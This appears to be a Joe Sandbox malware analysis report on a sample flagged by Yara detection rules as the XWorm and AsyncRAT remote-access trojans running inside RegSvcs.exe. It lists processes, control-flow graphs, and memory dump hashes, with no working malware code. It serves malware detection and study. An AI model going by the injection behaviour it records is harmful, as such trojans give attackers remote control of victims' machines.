                                Start time:02:15:20
                                Start date:18/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:02:15:23
                                Start date:18/12/2024
                                Path:C:\Windows\System32\ipconfig.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                Imagebase:0x7ff776840000
                                File size:35'840 bytes
                                MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:4
                                Start time:02:15:23
                                Start date:18/12/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Imagebase:0x970000
                                File size:45'984 bytes
                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:02:15:23
                                Start date:18/12/2024
                                Path:C:\Windows\System32\wermgr.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5968" "2404" "2616" "2496" "0" "0" "2348" "0" "0" "0" "0" "0"
                                Imagebase:0x7ff61d450000
                                File size:229'728 bytes
                                MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:14
                                Start time:02:17:58
                                Start date:18/12/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 1876
                                Imagebase:0xdb0000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:15.6%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:30.2%
                                  Total number of Nodes:43
                                  Total number of Limit Nodes:10

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 5607534-560796a 178 560796d call 5609480 0->178 179 560796d call 5609472 0->179 2 5607973-560799c 5 56079a1-56079b6 2->5 6 5607e28-5607e53 5->6 7 56079bc 5->7 12 5608104-5608125 6->12 13 5607e59-5607e6f 6->13 8 5607d14-5607d35 7->8 16 5607d37-5607d4b 8->16 17 5607d4d-5607d57 8->17 23 5608127-560813b 12->23 24 560813d-5608147 12->24 20 5607e76 13->20 19 5607d61-5607d67 16->19 17->19 19->5 22 5607e7b-5607e8a 20->22 25 5607edc-5607f08 22->25 26 5607e8c 22->26 27 5608151 23->27 24->27 36 5609247-5609281 25->36 37 5607f0e-5607f4f 25->37 26->20 26->25 28 5607e93-5607ea8 26->28 29 5607eaa-5607ebf 26->29 30 5608293-56082be 27->30 28->22 29->22 41 5608381-56083ac 30->41 42 56082c4-560833f 30->42 60 5609286-560928d 36->60 37->30 49 5607f55 37->49 52 5608428-5608453 41->52 53 56083ae-56083ba 41->53 42->36 66 5608345-5608348 42->66 49->8 49->12 49->20 49->25 49->28 49->29 63 5608459-56084bf 52->63 64 560851b-5608546 52->64 53->60 84 56084ca-56084ee 63->84 74 5608548-5608554 64->74 75 56085a9-56085ca 64->75 70 5608354-5608378 66->70 70->41 72 560837a 70->72 72->41 72->70 74->60 81 56085e2-56085ec 75->81 82 56085cc-56085e0 75->82 83 56085f6-56085fc 81->83 82->83 85 5608587-560859c 83->85 84->64 86 56084f0 84->86 93 56087b0-56087db 85->93 98 56085a2 85->98 86->64 86->75 86->84 87 5608741-5608785 86->87 88 5608582 86->88 89 5608822 86->89 90 5608849-56088e5 86->90 91 560878a-56087ab 86->91 92 560866b-56086b8 86->92 86->93 94 56084f7-5608501 86->94 95 56086bd-56086de 86->95 96 56086fd-560873c 86->96 97 56085fe-5608666 86->97 87->60 88->85 100 5608827-560883c 89->100 90->100 91->85 92->85 118 56087e1-56087eb 93->118 119 5608bf2-5608c13 93->119 94->36 99 5608507-5608516 94->99 120 56086e0-56086eb 95->120 121 56086ed-56086f2 95->121 96->60 97->85 98->75 98->87 98->88 98->89 98->90 98->91 98->92 98->93 98->95 98->96 98->97 99->60 100->60 105 5608842 100->105 105->89 105->90 123 56087f1-56087fe 118->123 124 56088ea-5608906 118->124 
144 5608c22-5608c27 119->144 145 5608c15-5608c20 119->145 125 56086f8 120->125 121->125 123->124 130 5608804-560881c 123->130 147 5608909 124->147 125->85 130->89 146 5608c2d 144->146 145->146 152 5608cfc-5608d07 146->152 150 5608913-5608927 147->150 153 5608a59-5608a5e 150->153 154 560892d 150->154 153->60 154->147 154->152 154->153 155 5608a13-5608a39 154->155 156 5608934-560895b 154->156 157 56089e7-5608a0e 154->157 158 560898d-56089e2 154->158 159 560895d-560898b 154->159 160 5608a3e-5608a54 154->160 155->150 156->150 157->150 158->150 159->150 160->150 178->2 179->2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ykk.$%a
                                  • API String ID: 0-2664548475
                                  • Opcode ID: 4ce50f01cd91f21d43f30bd9b7f446db347a1d72ab6da776b971cbf5d6706e6e
                                  • Instruction ID: 466b67d4ec90a2bedfe18c766e98f7391fef54aa275f33a4f7d8f3cabd491d49
                                  • Opcode Fuzzy Hash: 4ce50f01cd91f21d43f30bd9b7f446db347a1d72ab6da776b971cbf5d6706e6e
                                  • Instruction Fuzzy Hash: 99326D74A05215CFEB68EF24D994BAAB773BB89300F1080E9D50AAB395DF319D81CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: \VNn
                                  • API String ID: 0-207492048
                                  • Opcode ID: b064e8860f7ee304aee942bb2e3267206dbfe48b374f7c709fc7f5c2eec1b92f
                                  • Instruction ID: 480f0d3ac295f5b4fdd5fba77fe30ac08b6db38cca6476f568f57a2a1f0cc51d
                                  • Opcode Fuzzy Hash: b064e8860f7ee304aee942bb2e3267206dbfe48b374f7c709fc7f5c2eec1b92f
                                  • Instruction Fuzzy Hash: 7CB16C70E0020D8FDB54DFA9C8857DEBBF2EF88704F14816AD915A7294EB759889CF81

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  • Opcode Fuzzy Hash: 6250ad7d73d534555110085c60a55a44bb39b58867a52c85ade1d4a02ea5b62d
                                  • Instruction Fuzzy Hash: AB517B32B042958FC7898B74C5501AFBFBBBFCA200B5544AAD961EB391EB31CD05CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25a4010c9cc6766b5e7e860209280c0ea1448d119f02096f2d13102aafa31133
                                  • Instruction ID: 00b91f3087ca4d7b2cf72c56c93be61f241f1a0af042d25897b7cf3c2497ae1b
                                  • Opcode Fuzzy Hash: 25a4010c9cc6766b5e7e860209280c0ea1448d119f02096f2d13102aafa31133
                                  • Instruction Fuzzy Hash: 256144757003418FD758BF78E85C26ABBB6FBC8200745896AD926DB388DF309D49CB81
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28ded0d5cb4d9c9c0bb82befea06566ede7a207e0f74bef0b21f1f007e82364f
                                  • Instruction ID: 2d486d6d40c9f9391859069ad1646a98867e187908ce0ec28c2883f47ba17093
                                  • Opcode Fuzzy Hash: 28ded0d5cb4d9c9c0bb82befea06566ede7a207e0f74bef0b21f1f007e82364f
                                  • Instruction Fuzzy Hash: 1751FF34B041058FD7949B68D49875AF7B2EB88310F1489EAD606EB385DF71CC95CB80
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 76986b56173e616dd198cb23f7f0726bee58614e8e22de217abe1d3a5aaa2969
                                  • Instruction ID: accfe045e57b89cbdd363eb63586d375288bd44be6f5b9f34fea9fcc7b39acf8
                                  • Opcode Fuzzy Hash: 76986b56173e616dd198cb23f7f0726bee58614e8e22de217abe1d3a5aaa2969
                                  • Instruction Fuzzy Hash: 5D513471B1024A8FCB489BB8C4546AEFBF2FF99300F1544AAD555AB3A6D7308D06CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b9bf3b761da8bf14c8ae8d4d5413167d57e32f88efee569b6d0828c59ecbf90e
                                  • Instruction ID: c5ffa4026af5b7a61a8fa0dac99219aad73a135b2479009ea8c12f29c4d43433
                                  • Opcode Fuzzy Hash: b9bf3b761da8bf14c8ae8d4d5413167d57e32f88efee569b6d0828c59ecbf90e
                                  • Instruction Fuzzy Hash: 1051F5746002448FD758BB74E85C26E7BB6FBC8201741897AD526DB398DB309D49CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b76f6a3d2332bab42873746e19ff1d58437b93939cc373108d99c8c8dd1bdc3a
                                  • Instruction ID: f9fba1afccbe1cedf9958e76311db569dc36831cb522bca6dcd370f6f75d3cf8
                                  • Opcode Fuzzy Hash: b76f6a3d2332bab42873746e19ff1d58437b93939cc373108d99c8c8dd1bdc3a
                                  • Instruction Fuzzy Hash: 73512831B002148BDBD8AA78991537E76A79BC9251B1488B7D702EB764EF30CD19CB92
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d166518a62527fba3ba09f9bade80d871970b646ad862aeb69c42466038974c
                                  • Instruction ID: ab30ac4344e56c64f326131377e0df0ce3cf1fabbd84c65fecbf15e7715d259b
                                  • Opcode Fuzzy Hash: 9d166518a62527fba3ba09f9bade80d871970b646ad862aeb69c42466038974c
                                  • Instruction Fuzzy Hash: 0B514B31B041148BDBD85A78991537E76A3DBC9250F1488A7D702EB364EF30CD19CB92
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c4ab8330112a4efb33e4b25a482379a06368f34931989372d8a8f08f22ff298
                                  • Instruction ID: 594952859eab98b2a0f134861af91cff192932f76ab8089db8da6a10349156c9
                                  • Opcode Fuzzy Hash: 6c4ab8330112a4efb33e4b25a482379a06368f34931989372d8a8f08f22ff298
                                  • Instruction Fuzzy Hash: 2051D632B042568FCB88CB74C5506AFBBBABF89600F5094AAD916FB354DB31DD05CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 69c9daad2ad96e0faf9a1eb60f3d8a46b8b21dc4357c9bf60a4ca5874997d3a7
                                  • Instruction ID: 1c7397cb819031a6b87f283e395007d162a96932b10705e029526cffaf351df6
                                  • Opcode Fuzzy Hash: 69c9daad2ad96e0faf9a1eb60f3d8a46b8b21dc4357c9bf60a4ca5874997d3a7
                                  • Instruction Fuzzy Hash: 9241D871B1021A8FCB48DB68C454AAEFBF6FB88300F11846AD515BB765CB308D05CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b10b65cf7e3e89ad01dabd467d2eff9d6f783c3c759571c60264aedf5183b233
                                  • Instruction ID: cfe1f0caeab1f60d1d39b3a60dc3b914d585caf8197f48c8ab849d6ecb26a5c0
                                  • Opcode Fuzzy Hash: b10b65cf7e3e89ad01dabd467d2eff9d6f783c3c759571c60264aedf5183b233
                                  • Instruction Fuzzy Hash: 28518074E002069FDB49DBB4D8556AEBBB6EBC8300F20C469C526EB359EB309E45CF50
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e30d9ef0087d631d287f1bed3f51fdcea1c57b945f689381e32fb8e90462dc9
                                  • Instruction ID: adbc5edfcd58fd731dd63c2678bc982beefe5e78492d9b630556a4a7853a99f7
                                  • Opcode Fuzzy Hash: 2e30d9ef0087d631d287f1bed3f51fdcea1c57b945f689381e32fb8e90462dc9
                                  • Instruction Fuzzy Hash: 8B418274E102069FDB48DBA4D9556AEBBB6FBC8300F10C469C526EB359EB309A41CF50
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f36cb298f5d89eb8526028317dfbfdccbee5506f9784ebbe1da5368976066d38
                                  • Instruction ID: 926a15a09bcc8cbcd83c3085f619b008b395cbee9cd7ba7da3d1205dc9cdbf1e
                                  • Opcode Fuzzy Hash: f36cb298f5d89eb8526028317dfbfdccbee5506f9784ebbe1da5368976066d38
                                  • Instruction Fuzzy Hash: 1941D471B102098FCB48DFB4C995AAEBBFAFF8D600F14446AD605EB3A5CA319D05CB50
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ca8969107f0cc6b216eaef4a5d6410565f088837aa0a7f3f951fc7f148e221b
                                  • Instruction ID: c739eb552db7b6508f9223c4d904d4594cfb9b780f7ed451993c686ec376b579
                                  • Opcode Fuzzy Hash: 6ca8969107f0cc6b216eaef4a5d6410565f088837aa0a7f3f951fc7f148e221b
                                  • Instruction Fuzzy Hash: FB419C75B501108FC789EF29D908A5AF7B1FB8D610B1684EBDA06DB3A4DB30DC15DB41
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68605dd9ecb504d340d938a7132948244cb60d39bf742e192f33479cd2a6cde7
                                  • Instruction ID: e2c2fc684e2e6c91be9ee8637eb2c093540c12c54acac2cd69fc3aa535708438
                                  • Opcode Fuzzy Hash: 68605dd9ecb504d340d938a7132948244cb60d39bf742e192f33479cd2a6cde7
                                  • Instruction Fuzzy Hash: 9D313171B182458FD719DB68A95C367BBA7FBC822074A9563D409CB7C9CA34CC42CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a96b3b3b51bfd8693223b69e88e520d3deaf631b1ada1b5540ef7fe6c4b81b4
                                  • Instruction ID: e7e3e7040492858e9b0ebb6205638a15d16df844fc988fdbf1d65fff5cb0e3c4
                                  • Opcode Fuzzy Hash: 9a96b3b3b51bfd8693223b69e88e520d3deaf631b1ada1b5540ef7fe6c4b81b4
                                  • Instruction Fuzzy Hash: F73147727007048BD798AF7899441AE7BB6FBC81107949A7EC63AEB780DF30C948C751
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1fc3c39998d93b1565a8ffe531803ff582b058b4217ce252c7aba31def1ee5fb
                                  • Instruction ID: 1747f47f95162bc1dcec77f92728576eb4739af6f9a9482c909fb709d813cba1
                                  • Opcode Fuzzy Hash: 1fc3c39998d93b1565a8ffe531803ff582b058b4217ce252c7aba31def1ee5fb
                                  • Instruction Fuzzy Hash: 00313F71A181058FD758DBA8A95C3B7BBA7FBC822074A952BD009CB384C634CC42CB81
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9fd2eceb466a1eb1cb67dca53363e54d55f7b0a9351f3c2ae23307757486cb04
                                  • Instruction ID: 5d8ef6fcc97d211a1967256c221af6c8a5eeb0bb522060e5241230cade25cfd3
                                  • Opcode Fuzzy Hash: 9fd2eceb466a1eb1cb67dca53363e54d55f7b0a9351f3c2ae23307757486cb04
                                  • Instruction Fuzzy Hash: 0B21E131B2021D9BD398EA39580973F76D7F788320F946466E909DB280EB31DC46C7D2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: addd9695ee84ced0a82ac2e4a940bb4cbc4b5ef5ecfdf2bf75d613e2cef5c25d
                                  • Instruction ID: 9671a4a23bcd27f00ed2eaf19a7e7e1717889e82e52501b0045d0900e761d1d4
                                  • Opcode Fuzzy Hash: addd9695ee84ced0a82ac2e4a940bb4cbc4b5ef5ecfdf2bf75d613e2cef5c25d
                                  • Instruction Fuzzy Hash: D93159347142148BE788AB7D980972FFAABAFD5220F84651B9512D73D4CF70C9028B81
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0eac486674235feb42a0fa7908010d29ecd40088d1061ca0289a25bc9ae0ae45
                                  • Instruction ID: 87422106efcb49f27e6b69be297c7013e31f09e5732bce4f03f19f62da61c546
                                  • Opcode Fuzzy Hash: 0eac486674235feb42a0fa7908010d29ecd40088d1061ca0289a25bc9ae0ae45
                                  • Instruction Fuzzy Hash: D9214531F182478BEB9CCA7998847ADB6E3EBC8314F1881B6DB05E7294D731EC58C645
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b812349772a2638493563ba9c28e7eead140ad8de634049bcea9ae11aa1fe3e
                                  • Instruction ID: ca8f2411ee20c0b4c222ce69bf5e6fcaf1b01b0f61aaa8276a0ab6682696a3b8
                                  • Opcode Fuzzy Hash: 0b812349772a2638493563ba9c28e7eead140ad8de634049bcea9ae11aa1fe3e
                                  • Instruction Fuzzy Hash: E9214DB0E15645EFC799DFA9954518EFBF2BBC9200F24C8EBC005D7218E6708A569B40
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3710d488b3e2064fdac06869d03d9e001e60642608dd407c9ccaf2a8b5d033c2
                                  • Instruction ID: 08b45030fab8dcf651203eae3e61ece1adbf8bfe1dbfdd1264d5f93f8c412919
                                  • Opcode Fuzzy Hash: 3710d488b3e2064fdac06869d03d9e001e60642608dd407c9ccaf2a8b5d033c2
                                  • Instruction Fuzzy Hash: F5213EB0E15605EFC788DF69D64514EFBF6BBC8200F24C8EB8105D7218EB709B469B40

                                  Control-flow Graph

                                  control_flow_graph 276 2bfee98-2bfeea3 277 2bfeecd-2bfeeec call 2bfe5f8 276->277 278 2bfeea5-2bfeecc call 2bfe5ec 276->278 284 2bfeeee-2bfeef1 277->284 285 2bfeef2-2bfef51 277->285 292 2bfef57-2bfefe4 GlobalMemoryStatusEx 285->292 293 2bfef53-2bfef56 285->293 297 2bfefed-2bff015 292->297 298 2bfefe6-2bfefec 292->298 298->297
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd

                                  Control-flow Graph

                                  control_flow_graph 301 2bfe5f8-2bfefe4 GlobalMemoryStatusEx 304 2bfefed-2bff015 301->304 305 2bfefe6-2bfefec 301->305 305->304
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,02BFEEEA), ref: 02BFEFD7
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0

                                  Control-flow Graph

                                  control_flow_graph 308 2bfef68-2bfefae 310 2bfefb6-2bfefe4 GlobalMemoryStatusEx 308->310 311 2bfefed-2bff015 310->311 312 2bfefe6-2bfefec 310->312 312->311
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,02BFEEEA), ref: 02BFEFD7
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5d219bd5331db0cf6e5a13e52af53d2485bf9277de411cc1dcb8193511d40e6
                                  • Instruction ID: 33a976331cd7a8a7ed622860ca8e11607f1c7e7207ecf2dabe6793d8b18f8897
                                  • Opcode Fuzzy Hash: e5d219bd5331db0cf6e5a13e52af53d2485bf9277de411cc1dcb8193511d40e6
                                  • Instruction Fuzzy Hash: ACE13E34A00209DFDB09EBA8D858BAEBBB7FBC8310F158459D806A7395DB319E41DB51
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff6c68dc52f225859197c01b35a2aa078836423badc993bd70f3ecf83d5c30cf
                                  • Instruction ID: 1bd7e2dd6deb616b3f0607691945de1fbf955b9b984f2c6fdf85c4c8538763d4
                                  • Opcode Fuzzy Hash: ff6c68dc52f225859197c01b35a2aa078836423badc993bd70f3ecf83d5c30cf
                                  • Instruction Fuzzy Hash: 50E0D8323082901BD705575D5C50E1BAFA5EFCA360F05486AF484D3212C5105816D3A1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13f16144e64b27f25c39175ff727577adce274b9e80bfcf11d1a2aacb6789b9e
                                  • Instruction ID: 776aec205f5790304020b8779d67ef33e89189b71ca968a31c1c4519760663c5
                                  • Opcode Fuzzy Hash: 13f16144e64b27f25c39175ff727577adce274b9e80bfcf11d1a2aacb6789b9e
                                  • Instruction Fuzzy Hash: C4C1AD387042519FDB1A9F65C8ACB3F7BA6BF89604F148569E8068B395CF35CC42CB91
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f8031718f1ceb2cec4c6908387e64e07b98e03e73c0501415a61868d4d3875c7
                                  • Instruction ID: 2f95832ae91c2d1e9c6b44a052abbf4f167835bfc1379ed10e0b19029af6f988
                                  • Opcode Fuzzy Hash: f8031718f1ceb2cec4c6908387e64e07b98e03e73c0501415a61868d4d3875c7
